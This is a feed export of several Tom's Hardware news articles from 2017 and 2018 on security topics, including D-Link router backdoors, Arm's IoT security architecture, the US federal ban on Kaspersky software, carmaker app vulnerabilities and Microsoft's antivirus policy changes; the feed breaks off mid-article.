                                <p>Kaspersky Labs identified two hardcoded backdoor accounts and two security flaws in D-Link DIR-620 routers.</p><p>Despite being a terrible security practice, it’s actually not that uncommon for router or <a href="https://www.tomshardware.com/news/backdoors-sony-ipela-engine-cameras,33145.html">surveillance camera companies</a> to have hardcoded default credentials in their devices. Besides the potential for abuse from the companies themselves, this practice exposes users to all sorts of attackers, from <a href="https://www.ibtimes.co.uk/massive-ddos-attack-that-almost-brought-down-us-internet-how-it-happened-why-1587696">botnet owners</a> to <a href="https://www.tomshardware.com/news/cisco-reveals-vpnfilter-malware-500k-devices,37102.html">nation states</a>. The hardcoded credentials make it trivial to hack these devices once attackers learn about them.</p><p>According to Kaspersky’s researchers, the hardcoded account cannot be changed by the routers’ administrators. This probably means it was never meant to be seen by users and that the account is purposely made to allow D-Link employees to remotely log in to the routers. Kaspersky also discovered yet another backdoor account for Telnet, which could have given attackers administrative access to the routers.</p><p>One of the vulnerabilities Kaspersky found in D-Link’s DIR-620 routers allows for a cross-site scripting (XSS) attack. The D-Link developers seem to have missed filtering certain special characters, which can now allow attackers to deliver an exploit by sending malicious code to the routers. Another vulnerability is an operating system command injection, which is the result of incorrect processing of input data.</p><h2 id="d-link-needs-to-step-up-its-security-game">D-Link Needs To Step Up Its Security Game</h2><p>Although the two vulnerabilities are not too sophisticated, and D-Link developers should have been able to dodge them, the bigger issue is the hardcoded backdoor accounts. After many years, or decades even, of seeing such accounts being taken over by attackers, D-Link should have known better than to have them in its routers.</p><p>Kaspersky researched the DIR-620 router because it's a common router used by millions of people in Russia, as it's a router sold directly to ISPs, who then give it to their customers. However, as D-Link uses the same firmware on multiple router line-ups, it's possible the same type of vulnerabilities exist in other D-Link routers, too.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Arm Reveals More Details About Its IoT Platform Security Architecture ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/news/arm-iot-platform-security-architecture,36564.html</link>
                                                                            <description>
                            <![CDATA[ Arm announced documentation for the first stage of its Platform Security Architecture for IoT devices, which includes threat models and security analyses. The company also offered more details about its PSA roadmap. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">yLKhZ4cBR4fZ667rSPT54G</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/kQ4y6ZDMLmhze7ArP64Rch-1280-80.png" type="image/png" length="0"></enclosure>
                                                                        <pubDate>Thu, 22 Feb 2018 19:45:00 +0000</pubDate>                                                                                                                                <updated>Thu, 30 Jan 2025 16:32:10 +0000</updated>
                                                                                                                                            <category><![CDATA[Software]]></category>
                                                                                                                    <dc:creator><![CDATA[ Lucian Armasu ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/png" url="https://cdn.mos.cms.futurecdn.net/kQ4y6ZDMLmhze7ArP64Rch-1280-80.png">
                                                            <media:credit><![CDATA[null]]></media:credit>
                                                                                                                                                                                                                                                                                                                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/kQ4y6ZDMLmhze7ArP64Rch-1280-80.png" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>When it announced its <a href="https://www.tomshardware.com/news/arm-psa-iot-security-framework,35759.html">Platform Security Architecture</a> for IoT devices last year, Arm said that “security can no longer be optional.” Now, shortly after it announced <a href="https://www.tomshardware.com/news/arm-isim-kigen-cellular-iot-connectivity,36557.html">the iSim SoC</a> that's supposed to connect more devices to the IoT, the company revealed more about the PSA framework.</p><h2 id="the-internet-of-threats">The Internet Of Threats</h2><p>Kaspersky co-founder Eugene Kaspersky called <a href="https://www.tomshardware.com/news/kaspersky-iot-internet-of-threats,29450.html">the IoT the “Internet of Threats”</a> in 2015, and as we’ve seen in the years since, his description wasn’t too far off. Poorly secured IoT devices have enabled massive DDoS attacks <a href="https://www.tomshardware.com/news/dyn-ddos-attack-internet-threats,32908.html">that took out major internet services</a>, and that may be just the beginning, because we’re still in the early days of the IoT boom.</p><p>Arm promised to enable over a trillion internet-connected IoT devices by 2035. We don’t know yet what it could mean if malicious actors controlled even a small fraction of that, but it probably won’t be a pretty sight.</p><p>To make things worse, attackers may have found even bigger incentives to take over IoT devices: <a href="https://www.tomshardware.com/news/cryptojacking-remote-code-execution-attacks,36546.html">cryptojacking</a>, which sees attackers take over target devices and use them to mine cryptocurrencies they can then sell for a profit. IoT devices may not be remotely as powerful as PCs, but if attackers took over several billion of them, they could probably make a decent amount of money.</p><p>The good news is that Arm seems to take this issue quite seriously, or at least more seriously than individual device makers seem to take it right now, because many of them tend to have <a href="https://www.tomshardware.com/news/senator-warner-iot-ddos-attacks,32928.html">little incentive</a> to enable strong security for their devices. Arm has announced multiple security-oriented projects lately, including its <a href="https://developer.arm.com/products/system-ip/trustzone-security-ip/cryptoisland-family">CryptoIsland</a> secure enclave IP family as well as the PSA.</p><h2 id="platform-security-architecture">Platform Security Architecture</h2><p>According to Arm, the PSA aims to provide a holistic set of security guidelines for the IoT ecosystem, from chip makers to device developers, so they can successfully implement security features. When it launched the PSA framework last year, Arm announced three main components: IoT threat models and security analyses, hardware and firmware specifications, and a reference open-source device firmware.</p><p>Today, Arm announced the first stage of the PSA framework with the release of the first set of Threat Models and Security Analyses (TMSA) documentation. The company also <a href="https://pages.arm.com/psa-resources.html">published</a> threat model analyses for three types of IoT products: a smart water meter, a web camera, and an asset tracking device. Device makers can look at these examples to see how they should implement security features with their IoT products.</p><p>Additionally, Arm announced that the first open-source build of its reference firmware called Trusted Firmware-M, which conforms with the PSA specification, will be released in March 2018. The company will continue to develop and improve the open-source firmware after the release, too.</p><h2 id="securing-the-next-trillion-iot-devices">Securing The Next Trillion IoT Devices</h2><p>Arm still has some work to do to complete the launch of the PSA framework. The company’s plan is to start by releasing the first PSA architectural document, which is called the Trusted Base System Architecture-M (TBSA-M). 
The document is currently in active review with some key partners, and it provides guidance on hardware security features to silicon designers.</p><p>Another step in the evolution of the PSA framework will be building an ecosystem of developers interested in making PSA-compliant devices. Arm plans to enable high-level security APIs on which companies can depend when building secure IoT devices. The company is also working on a Compliance & Certification Program, which should make it easier for manufacturers to build secure devices and for consumers to identify which IoT devices are worth their money.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Kaspersky Sues US Government Over Antivirus Ban ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/news/kaspersky-sues-government-antivirus-ban,36140.html</link>
                                                                            <description>
                            <![CDATA[ Kaspersky launched a lawsuit against the Trump administration to try and repair damages to its business and reputation. The company also published an open letter explaining why the lawsuit was necessary. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">yan9k9WQhjt5YTMx9dbz93</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/DrcnFmnMVvks3yDpCUxh5i-1280-80.png" type="image/png" length="0"></enclosure>
                                                                        <pubDate>Mon, 18 Dec 2017 22:10:00 +0000</pubDate>                                                                                                                                <updated>Thu, 30 Jan 2025 16:32:10 +0000</updated>
                                                                                                                                            <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                                    <dc:creator><![CDATA[ Lucian Armasu ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/png" url="https://cdn.mos.cms.futurecdn.net/DrcnFmnMVvks3yDpCUxh5i-1280-80.png">
                                                            <media:credit><![CDATA[null]]></media:credit>
                                                                                                                                                                                                                                                                                                                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/DrcnFmnMVvks3yDpCUxh5i-1280-80.png" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p><span>Kaspersky announced that it launched a lawsuit against the Trump administration</span> arguing that the U.S. government’s <a href="https://www.tomshardware.com/news/kaspersky-banned-us-federal-networks,36111.html">ban of its software</a> lacked due process and evidence of harm.</p><h2 id="kaspersky-39-s-ban-on-u-s-federal-networks">Kaspersky's Ban On U.S. Federal Networks</h2><p><span>This September, the Department of Homeland Security (DHS) <a href="https://www.dhs.gov/news/2017/09/13/dhs-statement-issuance-binding-operational-directive-17-01">issued a directive</a> to civil agencies to stop using Kaspersky software within 90 days after concerns that the antivirus may help the Russian government in infiltrating U.S. networks and stealing sensitive information.</span></p><p><span>The government previously accused Kaspersky of stealing classified information from a national security <a href="https://theintercept.com/2017/07/21/justice-departments-demand-for-extreme-secrecy-in-reality-winner-trial-contested-by-defense/">whistleblower called Reality Winner</a>. Kaspersky admitted that it got the documents in a routine scan of Winner’s personal computer, but it said it immediately deleted those files once it learned what they were. 
It also offered to allow independent parties to review its antivirus’ source code, but the government didn’t think that was sufficient.</span></p><p><span>Last week, the new <a href="https://www.congress.gov/bill/115th-congress/house-bill/2810/text#toc-HC791755DF28D4E2BA0A5C4418094E922">National Defense Authorization Act of 2018</a> included a clause that would ban any Kaspersky or Kaspersky-associated software from being used in the U.S. federal government. Guilty or not, this seems to have left Kaspersky no choice but to sue the U.S. government in order to save its reputation (and revenue).</span></p><h2 id="kaspersky-s-open-letter">Kaspersky’s Open Letter</h2><p><span>Along with the lawsuit, Kaspersky also wrote an <a href="https://www.kaspersky.com/blog/kaspersky-lab-open-letter/20501/">open letter</a> to the U.S. government. The company argued that it has not been given the opportunity to defend itself properly before its technology was banned from use on federal networks. This has harmed its reputation and revenue, and Kaspersky believes that such actions violated the U.S. Constitution, more specifically the right to due process.</span></p><p><span>The company said that the U.S. government relied mainly </span><span>upon uncorroborated media reports, not evidence, to support its conclusion that the Kaspersky antivirus is a security risk for U.S. federal networks. </span></p><p><span>Kaspersky also noted that although the revenue it obtained from licensing its software to U.S. federal agencies was only a small percentage of its revenue, the ban on its software had a disproportionate negative effect both in the U.S. as well as globally.</span></p><p><span>Kaspersky is now suing the U.S. government to try and repair that damage to its sales as well as its reputation (presuming the U.S. court will find Kaspersky innocent).</span></p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Kaspersky Antivirus Banned From Use On US Federal Networks ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/news/kaspersky-banned-us-federal-networks,36111.html</link>
                                                                            <description>
                            <![CDATA[ Any Kaspersky Labs software or software affiliated with Kaspersky Labs and its successors will be banned from U.S. federal agencies' networks starting with 2018. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">iwCXWTJV4DUSBHGarv4jwX</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/DrcnFmnMVvks3yDpCUxh5i-1280-80.png" type="image/png" length="0"></enclosure>
                                                                        <pubDate>Wed, 13 Dec 2017 20:20:00 +0000</pubDate>                                                                                                                                <updated>Thu, 30 Jan 2025 16:26:58 +0000</updated>
                                                                                                                                            <category><![CDATA[Antivirus]]></category>
                                                    <category><![CDATA[Software]]></category>
                                                    <category><![CDATA[Security Software]]></category>
                                                                                                                    <dc:creator><![CDATA[ Lucian Armasu ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/png" url="https://cdn.mos.cms.futurecdn.net/DrcnFmnMVvks3yDpCUxh5i-1280-80.png">
                                                            <media:credit><![CDATA[null]]></media:credit>
                                                                                                                                                                                                                                                                                                                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/DrcnFmnMVvks3yDpCUxh5i-1280-80.png" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p><span>President Trump signed into law a bill that <a href="https://www.congress.gov/bill/115th-congress/house-bill/2810/text#toc-HC791755DF28D4E2BA0A5C4418094E922">bans the Kaspersky Antivirus</a> as well as any other software made by Kaspersky Labs from use in U.S. federal departments, agencies, or organizations. The law applies to any company that is controlled by Kaspersky in any way or in which it has majority ownership.</span></p><h2 id="u-s-government-bans-kaspersky">U.S. Government Bans Kaspersky</h2><p><span>Earlier this year, a <a href="https://www.cnbc.com/2017/09/14/confusion-hits-consumer-market-over-us-ban-of-kaspersky.html"><em>Wall Street Journal</em> report</a> backed by unnamed U.S. government sources said that hackers working for the Russian government stole documents from an NSA agent. The NSA agent in question took home classified data without permission, and because she was running the Kaspersky antivirus, the report alleged that this is how Kaspersky was able to identify the NSA documents.</span></p><p><span>Kaspersky has admitted that it identified the NSA files, but as soon as it did, the company <a href="https://apnews.com/c360a29de62245c4abdc65d83cd467d7/Kaspersky:-We-uploaded-US-documents-but-quickly-deleted-them">deleted the documents</a> its antivirus was able to capture for malware analysis. The antivirus firm also offered to allow independent parties to <a href="https://www.wsj.com/articles/russian-cybersecurity-firm-kaspersky-to-make-source-code-available-for-review-1508756502">review its software</a> code.</span></p><p><span>This response doesn’t seem to have convinced too many in Washington, because after the report, Congress has been scrambling to pass a bill that would ban the antivirus from federal agencies’ networks. The ban of Kaspersky’s software from the federal agencies’ networks was eventually written into the National Defense Authorization Act. The bill will go into effect from the start of 2018.</span></p><h2 id="how-it-all-started">How It All Started</h2><p><span>The whole situation seems to have started when an NSA agent, called Reality Winner</span>, who seems to have been a <a href="https://theintercept.com/2017/07/21/justice-departments-demand-for-extreme-secrecy-in-reality-winner-trial-contested-by-defense/">source</a> for some of The Intercept’s national security stories, took home some classified NSA documents. Kaspersky said that it encountered the documents by mistake, as the files were automatically uploaded to its cloud when the antivirus was scanning Winner’s computer.</p><p><span>This is one issue with cloud-based antivirus software: you have to have a high degree of trust in this type of security software when you’re allowing it to analyze every file you have on your computer and then to upload them to the vendor’s servers. Even Microsoft’s Windows Defender has a cloud component that is enabled by default these days.</span></p><p><span>The other side of the issue is that if Kaspersky wanted to look clean and not look like it stole the files or that it <a href="https://www.tomshardware.com/news/kaspersky-ties-russian-intelligence-questioned,34995.html">aided the Russian government</a> to do that, it should have probably alerted the U.S. government about this incident itself. </span></p><p><span>It’s hard to imagine that wouldn’t have made the U.S. government believe its side of the story more, if the company was the one telling the government about the classified data being leaked by a potential rogue agent. In fact, with Kaspersky protecting multiple U.S. federal networks already, one could argue that was already part of its job. </span></p><p><span>However, Kaspersky didn’t do that, which makes everyone question the company’s motives and become more inclined to believe the accusations that it was somehow aiding the Russian government in stealing those files.</span></p><h2 id="dealing-with-the-aftermath">Dealing With The Aftermath</h2><p>Regardless of whether or not Kaspersky had any role in Russian hackers obtaining the classified information, it looks like the U.S. government has already made up its mind about the company, which should impact both <a href="https://www.cnbc.com/2017/09/14/confusion-hits-consumer-market-over-us-ban-of-kaspersky.html">Kaspersky’s bottom line</a> as well as its reputation as a trustworthy security solution vendor. The company is now likely going to need to work extra hard to gain its customers' trust again.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Allegations Of Kaspersky Lab’s Ties To Russian Intelligence Intensify ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/news/kaspersky-lab-new-allegations,35688.html</link>
                                                                            <description>
                            <![CDATA[ More concerns arise with Kaspersky Lab. Should you be concerned? ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">qb6gNJtwkEpM5RALj4dRsi</guid>
                                                                                                                            <pubDate>Fri, 13 Oct 2017 22:05:00 +0000</pubDate>                                                                                                                                <updated>Thu, 21 Aug 2025 10:10:53 +0000</updated>
                                                                                                                                            <category><![CDATA[Cyber Security]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                                    <dc:creator><![CDATA[ Fritz Nelson ]]></dc:creator>                                                                                                                                                                                                                                                                                            <content:encoded >
                            <![CDATA[
                            <article>
<figure class="van-image-figure pull-" data-bordeaux-image-check ><div class='image-full-width-wrapper'><div class='image-widthsetter' style="max-width:1500px;"><p class="vanilla-image-block" style="padding-top:60.00%;"><img id="" name="" alt="" src="https://cdn.mos.cms.futurecdn.net/dzP2WhunXc2ogrwQcxeGsW.jpg" mos="https://cdn.mos.cms.futurecdn.net/dzP2WhunXc2ogrwQcxeGsW.jpg" align="" fullscreen="1" width="1500" height="900" attribution="" endorsement="" class="pull- expandable"><a href='https://cdn.mos.cms.futurecdn.net/dzP2WhunXc2ogrwQcxeGsW.jpg' target='_blank' class='expand-button icon-expand-image icon' ></a></p></div></div></figure><p><span>This week’s mainstream press circulated renewed concerns about tight relationships between the </span><a href="https://www.nytimes.com/2017/10/10/technology/kaspersky-lab-israel-russia-hacking.html?_r=0"><span>Russian government and Kaspersky Lab</span></a><span>, makers of popular anti-virus software.</span></p><p><span>Those concerns have festered for years. This year, they have heated up again amid a turbulent political environment. We wrote back in May about reports that the FBI was investigating the </span><a href="https://www.tomshardware.com/news/kaspersky-denies-allegations-russian-intelligence,34370.html"><span>company’s ties to Russian spy agencies</span></a><span>.</span></p><p><span>And in July, we reported on issues raised about </span><a href="https://www.tomshardware.com/news/kaspersky-ties-russian-intelligence-questioned,34995.html"><span>Kaspersky Lab secretly helping a Russian intelligence agency</span></a><span> respond to distributed denial of service attacks. In one program, Kaspersky employees allegedly accompanied FSB agents on physical raids. The origins of those reports, which only came to light this year, date back to 2009.</span></p><p><span>In the latest reports: Russian hackers had managed to get their digital hands on NSA documents stored on an employee’s home computer; the Department of Homeland Security put out an edict that all federal agencies would cease using Kaspersky software; and now, Israeli spies watched as a Russian government hacking crew used Kaspersky software to search for covert government programs. This last item, these reports say, was the result of Israeli security personnel hacking into Kaspersky’s network.</span></p><p><span>Kaspersky AV software is quite popular on consumer and business PCs, and these reports have raised questions about whether users should be concerned about using it. One of the key aspects being illuminated is that the tools used for these security breaches leverage the telemetry data that gets sent back as a routine part of any AV software. This can, of course, be turned off, although many users don’t know that.</span></p><p><span>Our sister site, Tom’s Guide, has talked to a variety of security experts about the risks of continuing to use Kaspersky software, compiling those opinions and specific recommendations into a report of its own, entitled “</span><a href="https://www.tomshardware.com/news/kaspersky-ties-russian-intelligence-questioned,34995.html"><span>Kaspersky Russian Spying Rumors: Should You Still Use This Antivirus?</span></a><span>”</span></p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Car Makers Haven’t Learned, Part 2: Same App Security Issues, 6 Months Hence ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/news/kaspersky-connected-cars-still-vulnerable,35505.html</link>
                                                                            <description>
<![CDATA[ In the second part of its security analysis of carmakers' mobile applications, Kaspersky found that not only did the carmakers not fix previously discovered vulnerabilities in their applications, but some of them haven't even updated their apps at all. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">VC6xudNNevPLuhekHqnyEG</guid>
                                                                                                                            <pubDate>Wed, 20 Sep 2017 21:40:00 +0000</pubDate>                                                                                                                                <updated>Tue, 16 Sep 2025 13:28:24 +0000</updated>
                                                                                                                                            <category><![CDATA[Cyber Security]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                                    <dc:creator><![CDATA[ Lucian Armasu ]]></dc:creator>                                                                                                                                                                                                                                                                                            <content:encoded >
                            <![CDATA[
                            <article>
<figure class="van-image-figure pull-" data-bordeaux-image-check ><div class='image-full-width-wrapper'><div class='image-widthsetter' style="max-width:699px;"><p class="vanilla-image-block" style="padding-top:48.50%;"><img id="" name="" alt="" src="https://cdn.mos.cms.futurecdn.net/mrYqBitKHsbeGQg8gwhwWM.jpg" mos="https://cdn.mos.cms.futurecdn.net/mrYqBitKHsbeGQg8gwhwWM.jpg" align="" fullscreen="1" width="699" height="339" attribution="" endorsement="" class="pull- expandable"><a href='https://cdn.mos.cms.futurecdn.net/mrYqBitKHsbeGQg8gwhwWM.jpg' target='_blank' class='expand-button icon-expand-image icon' ></a></p></div></div></figure><p><span>Earlier this year, Kaspersky’s security researchers <a href="https://www.tomshardware.com/news/insecure-apps-connected-cars-risks,33682.html">tested nine applications</a> offered by some of the major carmakers (Kaspersky still has not named them) and found that the apps failed all of its security tests. </span></p><p><span>The Kaspersky researchers wanted to see whether the carmakers’ apps were protected mainly from three typical kinds of attacks that mobile users may experience: gaining root permissions on the device (rooting), overlaying the app interface with a fake window, and injecting malicious code into a legitimate connected car app.</span></p><p><span>Malicious actors could use these types of attacks to steal user credentials or PIN codes, as well as a vehicle’s unique vehicle identification number (VIN), which is all that’s required to authenticate in the application. Once this data is obtained, the attackers can install the same app on their own devices, use the stolen credentials to track a car’s owner, or even unlock a car’s doors and steal it.</span></p><p><span>According to Kaspersky’s security researchers, this threat is no longer theoretical. Darknet forums now feature ads selling and buying such user credentials, which typically sell for more than someone’s credit card information would cost. This suggests that such information is quite valuable to those looking to buy it.</span></p><p><span>The researchers believe that because this type of attack seems so profitable, it may be just a matter of time before more widespread attacks begin.</span></p><h2 id="previously-tested-apps-still-vulnerable">Previously Tested Apps Still Vulnerable</h2><p><span>Even though Kaspersky had already warned the nine unnamed carmakers about their apps’ flaws, the apps still seemed to be vulnerable to the same type of attacks about half a year later. Not only that, but some of them haven’t received any update during all of this time.</span></p><p><span>In the second part of its analysis, Kaspersky also added four more applications from four more carmakers. It found that only one of the newly added apps was protected, and even that was only against a single attack vector: the app would refuse to operate if the phone was rooted.</span></p><p><span>Kaspersky believes that the carmakers have yet to build enough digital security expertise to deal with these sorts of issues properly.</span></p><p><span>However, it also seems to show that carmakers don’t take the issue seriously enough to invest more money in developing that much-needed expertise. As more of their cars become “connected” or even gain self-driving features, the need for better software security seems imperative. </span></p><p>“This problem is typical of manufacturers of other smart and connected electronics,” said Kaspersky in a recent post. “With cars, though, the issue feels more urgent and serious; hacks could cause losses in the tens of thousands of dollars, or even put someone’s life at risk,” added the company.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Citing Russia Fears, DHS Bars Federal Use Of Kaspersky Products ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/news/dhs-kaspersky-russia-fear-security,35456.html</link>
                                                                            <description>
                            <![CDATA[ The U.S. Department of Homeland Security said this decision was prompted by security concerns in Kaspersky's products and fears about the company's numerous ties to Russian intelligence agencies. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">LE7A6af2kb7N6qa6Ag6AwJ</guid>
                                                                                                                            <pubDate>Thu, 14 Sep 2017 16:15:00 +0000</pubDate>                                                                                                                                <updated>Thu, 30 Jan 2025 16:32:06 +0000</updated>
                                                                                                                                            <category><![CDATA[Cyber Security]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                                    <dc:creator><![CDATA[ Nathaniel Mott ]]></dc:creator>                                                                <dc:description><![CDATA[ https://cdn.mos.cms.futurecdn.net/haxMUaEZqfU93JRh9JXRNA.jpg ]]></dc:description>
                                                                                                                                                                                                                                                                        <content:encoded >
                            <![CDATA[
                            <article>
                                <figure class="van-image-figure pull-" data-bordeaux-image-check ><div class='image-full-width-wrapper'><div class='image-widthsetter' style="max-width:600px;"><p class="vanilla-image-block" style="padding-top:75.00%;"><img id="" name="" alt="" src="https://cdn.mos.cms.futurecdn.net/6acQ8hA2RoStCKR6HkXhtb.jpg" mos="https://cdn.mos.cms.futurecdn.net/6acQ8hA2RoStCKR6HkXhtb.jpg" align="" fullscreen="1" width="600" height="450" attribution="" endorsement="" class="pull- expandable"><a href='https://cdn.mos.cms.futurecdn.net/6acQ8hA2RoStCKR6HkXhtb.jpg' target='_blank' class='expand-button icon-expand-image icon' ></a></p></div></div></figure><p>The U.S. Department of Homeland Security (DHS) told federal agencies to "take actions related to the use or presence of information security products, solutions, and services supplied directly or indirectly by AO Kaspersky Lab or related entities." In a statement, DHS said this decision was prompted by security concerns in Kaspersky's products as well as fears about the company's numerous ties to Russian intelligence agencies.</p><p>Kaspersky's connections to Russian intelligence have dipped in and out of the news cycle over the last year. ABC News reported in May that the FBI was investigating the company for those ties, which Kaspersky denied, and in July leaked emails showed that the company helped FSB agents conduct physical raids on suspected hackers. Kaspersky was also said to have worked on tools to allow Russia to "hack the hackers."</p><p>None of those concerns are new. People have questioned the Kaspersky-Russia connection for years. But the U.S. government seems to be more interested in those ties than ever before, and as the DHS' Binding Operational Directive (BOD) made clear, it's certainly more willing to act on those fears. 
Here's <a href="https://www.dhs.gov/news/2017/09/13/dhs-statement-issuance-binding-operational-directive-17-01">what the department said</a> about its decision to bar federal agencies from using products made by or associated with Kaspersky:</p><p>The Department is concerned about the ties between certain Kaspersky officials and Russian intelligence and other government agencies, and requirements under Russian law that allow Russian intelligence agencies to request or compel assistance from Kaspersky and to intercept communications transiting Russian networks. The risk that the Russian government, whether acting on its own or in collaboration with Kaspersky, could capitalize on access provided by Kaspersky products to compromise federal information and information systems directly implicates U.S. national security.</p><p>These fears stem from the access that security products have to files and the systems on which they're stored. These products don't work unless they're given the ability to monitor and control many aspects of a system. If those products are compromised—willfully or not—they could be used to gather the sensitive information they were supposed to protect. That's why security products are prime targets for hackers.</p><p>Those aren't hypothetical concerns. A security researcher <a href="https://www.tomshardware.com/news/kaspersky-antivirus-tls-interception-vulnerability,33327.html">discovered a serious vulnerability</a> in Kaspersky's TLS interception tool in January, and in March, Wikileaks <a href="https://www.tomshardware.com/news/antivirus-programs-bypassed-cia-wikileaks,33845.html">revealed that the CIA had</a> bypassed most major antivirus programs. (Later, though, <a href="https://www.tomshardware.com/news/antivirus-vendors-cia-vault-7-leaks,33893.html">several said</a> their products had been updated to defend against those intrusions.) The U.S. 
government knows all too well what kind of data can be gleaned via compromised tools.</p><p>DHS said it would give Kaspersky a chance to submit a written statement "addressing the Department’s concerns or to mitigate those concerns" so it could "ensure that the company has a full opportunity to inform the Acting Secretary of any evidence, materials, or data that may be relevant." Businesses affected by the decision will also be able to send their comments about the decision before anything is finalized.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Pressed By Antitrust Complaints, Microsoft Changes Third-Party Antivirus Policies ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/news/microsoft-antivirus-policies-antitrust-complaints,35204.html</link>
                                                                            <description>
                            <![CDATA[ Microsoft announced that it changed some of its policies for how it treats third-party antivirus software on Windows. Most of the changes seem to directly address the antitrust complaints Kaspersky has been making to both the Russian and EU authorities. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">dnQuYkWMN4ggYYDzyzLZ8L</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/GhcwXjCtVyT2KwiR9wfaqN-1280-80.png" type="image/png" length="0"></enclosure>
                                                                        <pubDate>Thu, 10 Aug 2017 21:40:00 +0000</pubDate>                                                                                                                                <updated>Thu, 30 Jan 2025 16:32:03 +0000</updated>
                                                                                                                                            <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                                    <dc:creator><![CDATA[ Lucian Armasu ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/png" url="https://cdn.mos.cms.futurecdn.net/GhcwXjCtVyT2KwiR9wfaqN-1280-80.png">
                                                            <media:credit><![CDATA[null]]></media:credit>
                                                                                                                                                                                                                                                                                                                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/GhcwXjCtVyT2KwiR9wfaqN-1280-80.png" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
<figure class="van-image-figure pull-" data-bordeaux-image-check ><div class='image-full-width-wrapper'><div class='image-widthsetter' style="max-width:450px;"><p class="vanilla-image-block" style="padding-top:36.67%;"><img id="" name="" alt="" src="https://cdn.mos.cms.futurecdn.net/ottZdxjiKLKW58ET5G5vsc.png" mos="https://cdn.mos.cms.futurecdn.net/ottZdxjiKLKW58ET5G5vsc.png" align="" fullscreen="1" width="450" height="165" attribution="" endorsement="" class="pull- expandable"><a href='https://cdn.mos.cms.futurecdn.net/ottZdxjiKLKW58ET5G5vsc.png' target='_blank' class='expand-button icon-expand-image icon' ></a></p></div></div></figure><p><span>In June, </span><span><span>Russian antivirus company Kaspersky </span><a href="https://www.tomshardware.com/news/kaspersky-antitrust-microsoft-european-union,34676.html">filed an antitrust lawsuit</a> in the European Union against Microsoft. Kaspersky has been frustrated for some time with what it called "underhanded tactics" from Microsoft that were meant to eliminate third-party antivirus competition on Windows.</span></p><p><span>At the time, Microsoft claimed that it was only trying to <a href="https://www.tomshardware.com/news/microsoft-reacts-kaspersky-antitrust-complaints,34837.html">improve Windows security</a>. 
Now, Microsoft seems to have changed its tune, and the company has made some concessions to help third-party antivirus software better integrate with Windows 10 and be more compatible with the latest updates.</span></p><h2 id="microsoft-s-underhanded-tactics">Microsoft’s “Underhanded Tactics” </h2><p><span>Kaspersky previously complained that Microsoft was using some questionable tactics to de-emphasize the importance of third-party antivirus programs on Windows, while encouraging users to rely on its own Windows Defender security tool.</span></p><p><span>The tactics included showing Windows as being secure only when using the Windows Defender tool, while portraying other antivirus software as unsafe.</span></p><p><span>Another claimed tactic was that Microsoft was previously allowing only one antivirus to run on the system. Therefore, if users had already enabled Windows Defender, it wasn’t possible to run a third-party antivirus, too. However, Microsoft eventually eliminated this requirement in Windows, after complaints from Kaspersky to the </span><span>Russian Federal Antimonopoly Service (FAS).</span></p><p><span>Other unsolved issues about which Kaspersky complained included not giving antivirus companies enough time to make their software compatible with the latest Windows updates. 
